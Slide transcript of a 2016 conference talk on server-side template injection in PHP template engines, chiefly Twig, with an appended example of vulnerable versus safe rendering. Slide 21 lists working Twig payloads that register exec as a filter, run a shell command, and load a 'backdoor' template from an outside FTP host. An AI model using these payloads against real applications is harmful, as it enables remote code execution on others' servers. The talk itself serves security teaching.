
Security of Web Framework Templates (SSTI) - Özgür Web Günleri 2016


Published in: Engineering

  1. Security of Web Framework Templates (SSTI) - Ömer Çıtak, Özgür Web Teknolojileri Günleri 2016 - www.ozgurwebgunleri.org.tr, www.omercitak.com
  2. whoami
     ● Security Researcher @ Netsparker Ltd.
     ● Developer @ in my spare time
     ● Writer @ Ethical Hacking "Offensive & Defensive" Book
     ● Blog: omercitak.com
     ● All Social Platform: @Om3rCitak
  3. questions (built up over slides 3-7)
     1. Asp.net or PHP?
     2. Asp or Laravel?
     3. Laravel or Smarty?
     4. Smarty or Asp?
  8. why using framework? (built up over slides 8-14)
     ● Spaghetti Code (functions.php) :P
     ● Enforcing Coding Standard
     ● Pretty URLs
     ● Much of the code in less time
     ● MVC or other models
  15. what is the MVC? (slides 15-17)
  18. what is the VIEW layer? (slides 18-19) Template Engines:
     ● Twig
     ● Smarty
     ● Blade
     ● Volt
     ● Mustache
     ● etc...
  20. twig
     ● registerUndefinedFilterCallback("function_name")
     ● getFilter("filter")
     ● setCache("ftp://omercitak.com:21")
     ● loadTemplate("backdoor")
  21. exploit
     ● {{_self.env.registerUndefinedFilterCallback("exec")}}
     ● {{_self.env.getFilter("ls")}}
     ● {{_self.env.setCache("ftp://omercitak.com:21")}}
     ● {{_self.env.loadTemplate("backdoor")}}
  22. demo
  23. questions
  24. thanks www.omercitak.com All Social Platform: @Om3rCitak
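The payloads on slide 21 only work when untrusted input reaches Twig as template source rather than as a variable. The following is an added example, not code from the talk: the vulnerable Twig 1.x pattern beside the safe one, assuming twig/twig is installed via Composer and a constructed template named greeting.twig.

```php
<?php
// Added example (not from the slides). Assumes twig/twig (1.x API) via Composer.
require __DIR__ . '/vendor/autoload.php';

$twig = new Twig_Environment(new Twig_Loader_Array([
    // Constructed template: the untrusted value is a variable, never template source.
    'greeting.twig' => 'Hello {{ name }}!',
]));

// VULNERABLE: the user's string is concatenated into the template source.
// Twig parses whatever {{ ... }} the user sends, so calls on _self.env such as
// registerUndefinedFilterCallback/getFilter (slide 21) run with the web server's
// privileges. This is the SSTI sink.
function renderVulnerable(Twig_Environment $twig, string $userInput): string
{
    $template = $twig->createTemplate('Hello ' . $userInput . '!');
    return $template->render([]);
}

// SAFE: the template source is fixed and the untrusted value only enters the
// renderer as context data. It is HTML-escaped (autoescape is on by default)
// and is never parsed as Twig syntax.
function renderSafe(Twig_Environment $twig, string $userInput): string
{
    return $twig->render('greeting.twig', ['name' => $userInput]);
}

// Constructed harmless probe: an expression that is only evaluated if the input
// was parsed as template code. Useful in a unit test to prove the sink is closed.
$probe = '{{ 7 * 7 }}';
echo renderVulnerable($twig, $probe), "\n"; // probe is evaluated: the sink is open
echo renderSafe($twig, $probe), "\n";       // probe is echoed back as plain text
```

If template source genuinely must be user-controlled (e.g. user-editable e-mail templates), Twig's sandbox extension (Twig_Extension_Sandbox with a Twig_Sandbox_SecurityPolicy) can restrict which tags, filters, methods and properties a template may use; treat it as defence in depth, not a substitute for keeping user data out of template source.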
